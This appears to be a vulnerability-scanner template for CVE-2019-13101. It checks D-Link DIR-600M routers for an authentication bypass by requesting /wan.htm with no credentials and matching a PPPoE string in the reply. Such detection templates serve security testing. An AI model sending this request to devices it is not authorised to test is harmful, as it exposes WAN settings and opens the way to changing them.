id: CVE-2019-13101 info: author: Suman_Kar name: D-Link DIR-600M - Authentication Bypass description: An issue was discovered on D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices. wan.htm can be accessed directly without authentication, which can lead to disclosure of information about the WAN, and can also be leveraged by an attacker to modify the data fields of the page. severity: critical tags: cve,cve2019,dlink,router,iot reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-13101 - https://github.com/d0x0/D-Link-DIR-600M - https://www.exploit-db.com/exploits/47250 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2019-13101 cwe-id: CWE-306 requests: - raw: - | GET /wan.htm HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "/PPPoE/" part: body